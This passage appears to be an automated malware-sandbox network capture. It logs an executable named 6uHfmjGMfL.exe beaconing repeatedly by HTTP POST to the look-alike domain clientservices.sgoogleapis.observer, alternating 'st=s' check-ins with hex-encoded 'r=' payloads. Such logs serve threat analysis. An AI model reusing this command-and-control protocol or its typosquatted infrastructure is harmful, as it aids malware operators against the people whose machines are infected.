              server-timing: cfL4;desc="?proto=TCP&rtt=2131&min_rtt=2131&rtt_var=1065&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              28192.168.2.550003104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:58.669764042 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:59.313751936 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:59 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fhBi3ChooyeM7UJMqi6E0j9y7L93K6uqiDrSsBuyyF3Jme3Vrs95%2FMlaJQumk8hQzAcd4WOznZXmZUcIR15z0qF%2FmOPrFwW0X2miHa9JR9X7yjrDoEeMArh%2FEdVKrBQVIZWa%2F4I9iomEyQ47SZNbMX78oOa77w%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea90c14ea543ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1715&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              29192.168.2.550004104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:00.824453115 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:01.557617903 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:01 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nL0mEBvg6KDfWMI%2B7gC9b922cit065oHZ1XsB%2Bv2I4mcHtJG%2BwFA7ShkiyAwt9ir%2FVmrvCIFXOgMuYaIy1gWj7PVVjgI07oi8oeUz3SwDGqFih%2BnoZqY5UyJAB9zw7q8MxqamlSnDzEiMBHf7T6uRgG7he2FyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea90cecce30f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1474&rtt_var=737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              30192.168.2.550005104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:03.186043024 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:45:03.832396030 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:03 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6IfdyZYBqJ3iTj4%2FHTqVNu%2BnlyJeCOq9fVJulUOrRmZ4iAmhhOMgwewLsK%2FN6Hqw3VnV1KT57rxZDFjBy4LWfgv9S6LDy3WcONQu4SJaGfSJJSjsjfYUVrbTp9MXNQlR9qlFCHaoS5hZ0iOcYtp2%2BvNUu39DLw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea90dd8de742d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1510&min_rtt=1510&rtt_var=755&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              31192.168.2.550006104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:05.341713905 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:05.896019936 CET820INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:05 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2FoyIWXJl7MW3yFK8kW4vag6lRbnzXAQ73Q7aL9i%2BHCw6oefslebUPWJyLtTfH7bn5V5JUpc5VJGb%2FEQSI42uOrVIRGbbLBIpSjL1cK3x74hNvIcaonlAQb%2B1HOjGmsryRPrQPNLFl9lpaWX8EzR5voJ%2BhPITA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea90eaeddd42d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1535&rtt_var=767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a
              Data Ascii: 7 <c><d>
              Jan 8, 2025 08:45:06.023324013 CET5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              32192.168.2.550007104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:07.654402971 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:45:08.286063910 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:08 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C4T8a8CU1AOLzw3MhuA1JnZJ%2BI9y%2BcBjdmNhhywqNW%2B9sHWnTCU9e7vOHyzG05N4e%2B2QBVfMkJHhADzcvoRL2Kv9D6o7mh6MLTzQxkfYNVp69Tz36Mv%2F3Gq%2F7VdOfYm66n2f0P4pvOgbvPwNIZTTs4rdVzzvkg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea90f95c5ac443-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1566&rtt_var=783&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              33192.168.2.550008104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:09.795150995 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:10.456854105 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:10 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lgd%2BNenlWth%2FsV0KndY38BCAUcYnm5UXwMPd4yxnQNkNzilnTdo0F6O7v8tFMqMzDmGKk%2B2WZRzASL3V2bpfNiPiUPcLwWaXwHw2kn9rGu8ivdGc0yAeB78SeY%2FXiTL6OVVBrWyJTisKgIoieJPOR55i%2Bbs6BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9106dced7d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1949&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              34192.168.2.550009104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:12.091746092 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:45:12.721060038 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:12 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KnsiWIyFl%2Bv27EKJ2HhK44UTJf9XXA%2BjJ1OLPAOjgbZRCGxYWIxLq0WvHrOwXNmq3lSBICBrC54jeG1xmoRXZwI8EEiJaQodCHcYa9QxY%2FiydKPG9DS%2BlbUm9qC7jyDmgYGBpnxujS2Ybz4tWyBP4wzdTE0EMw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea91151e7cc443-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1607&rtt_var=803&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              35192.168.2.550010104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:14.232621908 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:14.884509087 CET831INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:14 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ecy%2FpyRmFP7GMS4BP9cJmLZtEt7FRYsrczAoD3MklLef5%2F02ZaOxGIW6ThT20EU3KwMT9T6nhfOV734cGjeORh%2B3rNWs%2B3eH7LlKgkb3Drg%2Bfol239STzZQo7s4A2xyPAyOeTna9%2FtSC%2BmyDi7kK%2FEWs9Bbftg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea91228af042d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1561&rtt_var=780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              36192.168.2.550011104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:16.514049053 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:45:17.157099009 CET819INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:17 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=baWOKMSzc7%2BkO%2FgE1rqv58PkWErBAsUNiXftwjhR%2F0XQvtWWIzGl61MH9k9arNb5zjPtRFTllN6C0R01oAh2wObx6R2QAGfiUb%2Bg7uCSZJ41YVCNil558tfmWRDG2CsMB8nKRGFePiTtZITF%2F0go1bECUOU6wA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9130decbc443-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              37192.168.2.550012104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:18.669969082 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:19.300968885 CET819INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:19 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5DkSa0wAH8zp7bwycqFg4pAS6AfSWbXXKlc2J4TAxPVAeZEar8GZEvwoePqz9zYTHGTINcIv5TbV9rgt4eIEB9vZC%2F3Rv9q%2B3k5ndO8OHidxaAclLeWCa1oEtz4MahoBQZUF4Jm5Tzi3xp6Sn8KsX1m2SI7bsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea913e3f29c443-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1599&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              38192.168.2.550013104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:20.936687946 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:45:21.567949057 CET816INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:21 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=USaIXIgFx7dn91BqlNl93kbZAWrzPz%2FkzfFLwoLVxk3iIf8m0MPG9G9dCAaM88ajZeWgFS3zJJ2GNXIZneuvMrX9c8Chy%2Bjx1epck6WZG4%2BLs4Stli6RosMa5gMQLPVspbJAKy2D23VwfIiPavrc8LyRg3gnCA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea914c5e858c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=2042&rtt_var=1021&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              39192.168.2.550014104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:23.078464985 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:23.716007948 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:23 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GcgJBCu2DWHo2nJJsGhynk5SvN2XbzlvoYFED1M05L1jQOV%2B877Sk0s2mb%2FINt93lV3ZcL2TwDlyAIpbXjXf71B5baK5PsTpdcPdkMk4TujSHSmYDonxv7BkTjTLRVz1Vz7VmJKKL7NMmR1U%2BivHMv15m1tItg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9159be160f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1460&min_rtt=1460&rtt_var=730&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              40192.168.2.550015104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:25.796592951 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:45:26.355808020 CET815INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:26 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dHpZADUAmC6JtQFCDuUKOD%2BbRbi8%2FaUrICTtYQrz9MJE9jGt4SGEHKRsbmOCVgNUXCF8991sMuN6WzBm2pozmcjPtKVgbYLEt6bUtFdy8ttLByhiLhuxopwhRMnwYuS7M9pTVQ3xLlkp2wYwa4mQL%2FkM9gkPiA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea916adfe942d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1570&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              41192.168.2.550016104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:27.873799086 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:28.528362989 CET831INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:28 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
